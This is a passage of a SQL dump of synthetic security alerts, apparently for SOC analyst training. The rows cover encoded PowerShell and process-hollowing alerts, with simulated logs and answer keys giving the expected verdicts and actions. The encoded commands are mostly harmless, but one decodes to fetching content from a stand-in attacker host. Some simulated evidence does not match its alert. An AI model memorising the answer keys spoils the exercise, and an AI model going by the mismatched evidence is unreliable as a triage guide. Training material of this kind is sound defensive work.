4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1731, 'Potential Process Hollowing in Explorer.exe', 'medium', 'Sysmon', 'Process hollowing detected in explorer.exe, but further analysis suggests it may not be malicious.', 'Malware', 'T1055', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:22:58Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"\",\"username\":\"jsmith\",\"hostname\":\"INTERNAL-PC02\",\"command_line\":\"explorer.exe /loadlibrary\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in process execution\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash not associated with any known malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"explorer.exe /loadlibrary\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Usage of loadlibrary is uncommon but not necessarily malicious\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process hollowing alert in explorer.exe is likely a false positive due to clean file hash.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.086Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:22:58Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"INTERNAL-PC02\\\",\\\"command_line\\\":\\\"explorer.exe /loadlibrary\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1732, 'Encoded PowerShell Command Execution', 'high', 'CrowdStrike', 'A PowerShell script with an encoded command was executed on an internal host, potentially communicating with an external IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:11:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"203.0.113.40\",\"username\":\"mwhite\",\"hostname\":\"INTERNAL-WORKSTATION03\",\"command_line\":\"powershell -EncodedCommand c2VjcmV0IG1lc3NhZ2U=\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing suspicious encoded PowerShell\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for hosting malicious scripts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand c2VjcmV0IG1lc3NhZ2U=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicates malicious use\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of an encoded PowerShell command with external communication suggests a malware infection.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1733, 'PowerShell Execution with External IP Contact', 'high', 'SentinelOne', 'Encoded PowerShell executed on an internal host with communication to a known malicious external IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T20:15:53Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"198.51.100.50\",\"username\":\"jdoe\",\"hostname\":\"LAPTOP-USER01\",\"command_line\":\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP executing potentially malicious PowerShell\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for malicious activities multiple times\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command mirrors known attack patterns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded command and contact with a malicious IP confirm a malware attempt.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1734, 'False Positive: Benign PowerShell Activity', 'low', 'Carbon Black', 'Detected PowerShell activity with encoded command execution. Further analysis reveals it to be a benign script.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T22:40:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.80\",\"dst_ip\":\"192.168.1.100\",\"username\":\"awilliams\",\"hostname\":\"DESKTOP-USER02\",\"command_line\":\"powershell -EncodedCommand Y2FsYyA3Kjcp\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.80\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing benign PowerShell\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand Y2FsYyA3Kjcp\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded command decoded to a benign script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command, once decoded, is confirmed to be non-malicious.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1735, 'PowerShell Encoded Script Execution Detected', 'high', 'CrowdStrike', 'A PowerShell download cradle executed an encoded script on an internal machine, indicating a potential compromise.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-15\",\"command_line\":\"powershell.exe -EncodedCommand UwBFAFgAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBlAHgBhABtAHAAbABlAC4AYwBvAG0AIgA=\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UwBFAFgAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBlAHgBhABtAHAAbABlAC4AYwBvAG0AIgA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell script linked to known malware activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address indicating a compromised host\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of an encoded PowerShell script suggests an attempt to bypass security controls.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1736, 'Process Hollowing in Explorer.exe Detected', 'critical', 'SentinelOne', 'Process hollowing detected in explorer.exe, indicating potential malware activity.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:20:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"workstation-25\",\"command_line\":\"explorer.exe\",\"file_hash\":\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Process hollowing is a known technique for stealthy malware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variants\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised workstation\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is a covert technique used by malware to inject malicious code into a legitimate process.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1737, 'Suspicious PowerShell Activity Observed', 'medium', 'Carbon Black', 'PowerShell executed a script with encoded commands, which may indicate malicious intent.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:55:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"\",\"username\":\"mbrown\",\"hostname\":\"workstation-45\",\"command_line\":\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell commands often indicate obfuscation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, further investigation needed\"}}],\"expected_actions\":[\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is indicative of potential evasive techniques.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 